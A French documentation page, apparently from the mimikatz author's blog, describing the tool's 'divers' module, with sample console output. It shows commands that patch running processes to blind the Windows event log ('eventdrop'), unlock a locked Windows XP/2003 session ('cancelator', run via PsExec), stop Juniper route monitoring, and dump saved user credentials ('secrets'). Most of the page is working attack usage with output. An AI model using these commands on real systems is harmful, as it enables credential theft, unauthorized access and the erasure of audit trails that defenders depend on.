mimikatz :: divers

divers

Quelques fonctions trop petites pour s’émanciper

Méthodes :

noroutemon

Description : [expérimental] Patch le service Juniper Network Connect pour ne plus superviser la table de routage
Arguments : n.a.
Remarque : Patch expérimental, seulement testé sur la version 7.1 que j’utilise
Article : http://blog.gentilkiwi.com/securite/surveillance-des-routes-par-juniper
Exemple : divers::noroutemon

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # divers::noroutemon
Service : Juniper Network Connect Service
Recherche des patterns dans : @pid(1908)
Patch @pid(1908) : OK

eventdrop

Description : [super experimental] Patch l’observateur d’événements pour ne plus rien enregistrer
Arguments : n.a.
Remarque : Patch super expérimental
Article : http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle
Exemple : divers::eventdrop

En NT5 :

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # divers::eventdrop
Service : Journal des événements
Recherche des patterns dans : eventlog.dll@pid(720)
Patch eventlog.dll@pid(720) : OK

En NT6 :

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # divers::eventdrop
Service : Journal d'événements Windows
Recherche des patterns dans : wevtsvc.dll@pid(228)
Patch wevtsvc.dll@pid(228) : OK

cancelator

Description : Patch le bouton annuler de Windows XP et 2003 en console pour déverrouiller une session
Arguments : n.a.
Remarques :

  • Ne fonctionne que sous Windows XP et 2003 en x86
  • Est rarement utilisé depuis le poste lui même, plutôt via PsExec (avec -s), rendant le privilège DEBUG inutile

Vidéo: http://www.youtube.com/watch?v=aEvgPWRidq8
Exemple : divers::cancelator

mimikatz # divers::cancelator
Recherche des patterns dans : @pid(676)
Patch @pid(676) : OK
Recherche des patterns dans : @pid(324)
Patch @pid(324) : OK

secrets

Description : Affiche les secrets utilisateur (mots de passe pré enregistrés par exemple)
Arguments : n.a.
Exemple : divers::secrets

mimikatz # divers::secrets
Nombre de secrets : 18

TargetName         : WindowsLive:name=*kiwi*@hotmail.com
Type               : GENERIC (1)
UserName           : *kiwi*@hotmail.com
** 00
Texte              : *

TargetName         : LegacyGeneric:target=OutlookSocialConnectorC.{AFF7809A-947D-489B-8659-931D3DBC56D0}
Type               : GENERIC (1)
UserName           : *kiwi*@hotmail.com
** 00

TargetName         : MicrosoftOnlineServices:target=virtualapp/didlogical
Type               : GENERIC (1)
UserName           : *
** 00
Texte              : *

TargetName         : LegacyGeneric:target=Microsoft_OC1:uri=benjamin@*.onmicrosoft.com:specific:CER:1
Type               : GENERIC (1)
UserName           : benjamin@*.onmicrosoft.com
** 00
Texte              : *

Une réflexion au sujet de « mimikatz :: divers »

  1. hi,
    My french is not very good.

    Is it possible that you could explain in your video, command by command..?

    Thanks.. and Viva la Francia.!!

    Répondre

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>